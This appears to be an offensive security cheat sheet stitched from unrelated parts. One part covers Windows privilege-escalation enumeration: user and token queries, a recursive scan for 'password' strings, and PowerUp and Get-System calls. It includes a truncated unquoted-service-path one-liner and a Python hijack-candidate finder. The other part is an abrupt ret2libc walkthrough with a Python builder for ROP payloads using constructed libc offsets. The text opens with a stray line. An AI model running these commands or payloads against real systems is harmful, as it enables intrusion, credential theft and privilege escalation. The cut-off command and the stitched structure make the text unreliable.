It's not available to the public yet.
```
# Systeminfo
systeminfo
hostname
# Especially good with hotfix info
wmic qfe get Caption,Description,HotFixID,InstalledOn

# What users/local groups are on the machine?
net users
net localgroup
net localgroup Administrators
net user morph3
# Cross-check the domain too
net user morph3 /domain
net group Administrators /domain

# Network information
ipconfig /all
route print
arp -a

# Which privileges does our token hold?
whoami /priv

# Recursive string scan
findstr /spin "password" *.*

# Running processes
tasklist /SVC

# Network connections
netstat -ano

# Directories without the read-only attribute (not the same as writable: confirm with icacls)
dir /a-r-d /s /b
```

### Some good one-liners

```
# Obtain the path of the executable called by a Windows service (good for checking unquoted paths).
# Typed at an interactive cmd prompt; inside a .bat file the %i variables become %%i.
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
```
```
# PowerShellMafia
# Always use the dev branch.
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# PowerUp.ps1 and Get-System.ps1 live in the Privesc folder of the same repo.
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

# Sherlock
# https://github.com/rasta-mouse/Sherlock

# Unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v
```
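The unquoted-path filters above only print candidate services; they do not tell you which paths the service control manager would actually try first. The following is an added example (not code from the original page or from PowerSploit) that parses the padded table `wmic service get name,pathname,startmode` prints, applies the same filter as the one-liner (Auto start, outside `C:\Windows`, unquoted and containing spaces), and lists the `.exe` paths Windows would probe before the real binary. The sample table is constructed for the example; the service names and paths are not from a real host.

```python
import re

# Constructed sample of `wmic service get name,pathname,startmode` output.
# Service names and paths are made up for this example, not taken from a real host.
SAMPLE_WMIC = r"""
Name         PathName                                                 StartMode
AppSvc       C:\Program Files\Example App\bin\appsvc.exe              Auto
QuotedSvc    "C:\Program Files\Quoted Vendor\svc.exe" -k netsvcs      Auto
NoSpaceSvc   C:\Windows\System32\svchost.exe -k LocalService          Auto
ManualSvc    C:\Program Files\Manual Tool\tool.exe                    Manual
"""


def parse_wmic_services(text):
    """Split padded wmic table output into dicts; the first non-empty line is the header."""
    rows = []
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    for ln in lines[1:]:
        # wmic pads columns with runs of spaces; a single space inside a path survives the split
        fields = re.split(r"\s{2,}", ln.strip())
        if len(fields) != 3:
            continue  # a path containing a double space would break the column split
        name, pathname, startmode = fields
        rows.append({"name": name, "pathname": pathname, "startmode": startmode})
    return rows


def hijack_candidates(pathname):
    r"""Paths the service control manager tries before the real executable.

    For the unquoted `C:\Program Files\Example App\bin\appsvc.exe` Windows tries
    `C:\Program.exe`, then `C:\Program Files\Example.exe`, then the real file.
    A quoted path, or a path without spaces, yields nothing.
    """
    if pathname.startswith('"'):
        return []
    m = re.match(r"(.*?\.exe)", pathname, re.IGNORECASE)
    exe_path = m.group(1) if m else pathname  # drop service arguments after the .exe
    tokens = exe_path.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def find_unquoted_services(text):
    r"""Same filter as the wmic one-liner: Auto start, outside C:\Windows, unquoted with spaces."""
    findings = []
    for svc in parse_wmic_services(text):
        if svc["startmode"].lower() != "auto":
            continue
        if svc["pathname"].lower().startswith("c:\\windows\\"):
            continue
        cands = hijack_candidates(svc["pathname"])
        if cands:
            findings.append({"name": svc["name"], "pathname": svc["pathname"], "candidates": cands})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_services(SAMPLE_WMIC):
        print(f"{f['name']}: {f['pathname']}")
        for c in f["candidates"]:
            print(f"    would be tried first: {c}")
```

A candidate path only matters if you can write to its parent directory (check with `icacls` on `C:\` and `C:\Program Files\Example App`) and the service runs as a higher-privileged account and can be restarted or survives a reboot; the parser tells you where to look, not whether it is exploitable.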
*It is a 64-bit, dynamically linked binary; NX and ASLR are enabled.*
There is a lot that can be done in binary analysis, but here I focus mainly on the ret2libc attack.
Many other tools would work, but these are the ones I mainly use:
- pwntools (python library)
- A reverse engineering tool (Ghidra, IDA, etc.)
- First things first: we need to analyze the binary to determine which attack vector to use.
Overflowing the buffer lets us overwrite the saved return address on the stack, so the function returns to an address of our choosing, which ends in code execution.
Keep in mind that with NX enabled we can't simply jump to shellcode placed on the stack; instead we return into code that is already executable, such as libc's `system` (ret2libc).
The classic 32-bit layout is `junk_buf + system_addr + exit_addr + binsh_addr`: `system` is entered with `exit_addr` as its fake return address and the pointer to `/bin/sh` as its first argument on the stack. Since this binary is 64-bit, the first argument is passed in RDI rather than on the stack, so the chain needs a `pop rdi; ret` gadget: `junk_buf + pop_rdi_ret + binsh_addr + system_addr + exit_addr`. With ASLR on, the libc addresses are not fixed; they are computed at runtime by leaking one libc symbol and subtracting its known offset to get the base.
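The following is an added example (not code from the original page) of how the stack layout above is assembled once a libc address has been leaked. It uses plain `struct` instead of pwntools so it runs anywhere, but the packing is the same as `p32`/`p64`. The libc offsets, the leaked `puts` address, the padding length and the `pop rdi; ret` gadget address are constructed values for this example: on a real target they come from `readelf -s libc.so.6` (or pwntools' `ELF`), a leak from the running process, a cyclic pattern and `ROPgadget`/`ropper` respectively.

```python
import struct


def p32(x):
    return struct.pack("<I", x & 0xFFFFFFFF)


def p64(x):
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)


# Constructed symbol offsets standing in for the target's libc. They are NOT from a
# real libc build; read the real ones with `readelf -s libc.so.6` or pwntools' ELF().
LIBC_OFFSETS = {
    "puts": 0x80ED0,
    "system": 0x4F550,
    "exit": 0x43120,
    "str_bin_sh": 0x1B3E1A,
}


def libc_base_from_leak(leaked_addr, symbol, offsets=LIBC_OFFSETS):
    """ASLR slides libc as a whole, so one leaked symbol address gives the base."""
    base = leaked_addr - offsets[symbol]
    if base & 0xFFF:
        raise ValueError("libc base is not page aligned: wrong offset table or bad leak")
    return base


def ret2libc_chain_i386(pad_len, base, offsets=LIBC_OFFSETS):
    """32-bit layout: system() takes its return address and argument from the stack."""
    return (
        b"A" * pad_len
        + p32(base + offsets["system"])      # overwrites the saved EIP
        + p32(base + offsets["exit"])        # fake return address for system()
        + p32(base + offsets["str_bin_sh"])  # system()'s argument
    )


def ret2libc_chain_amd64(pad_len, base, pop_rdi_ret, offsets=LIBC_OFFSETS, ret_gadget=None):
    """64-bit layout: the first argument travels in RDI, so a `pop rdi; ret` gadget loads it."""
    chain = b"A" * pad_len
    if ret_gadget is not None:
        chain += p64(ret_gadget)                 # optional extra `ret` to realign RSP to 16 bytes
    chain += p64(pop_rdi_ret)                    # overwrites the saved RIP
    chain += p64(base + offsets["str_bin_sh"])   # popped into RDI
    chain += p64(base + offsets["system"])
    chain += p64(base + offsets["exit"])         # system() returns here once the shell exits
    return chain


if __name__ == "__main__":
    # Constructed values: a leaked puts address and a gadget in a non-PIE binary.
    base = libc_base_from_leak(0x7FFFF7E50ED0, "puts")
    payload = ret2libc_chain_amd64(pad_len=40, base=base, pop_rdi_ret=0x401223)
    print(f"libc base 0x{base:x}, payload {len(payload)} bytes")
```

The page-alignment check in `libc_base_from_leak` catches the most common mistake in this attack: using offsets from a libc version other than the one the target loaded. If `system` crashes with a `movaps` fault on x86-64, pass a plain `ret` gadget as `ret_gadget` to fix the stack alignment.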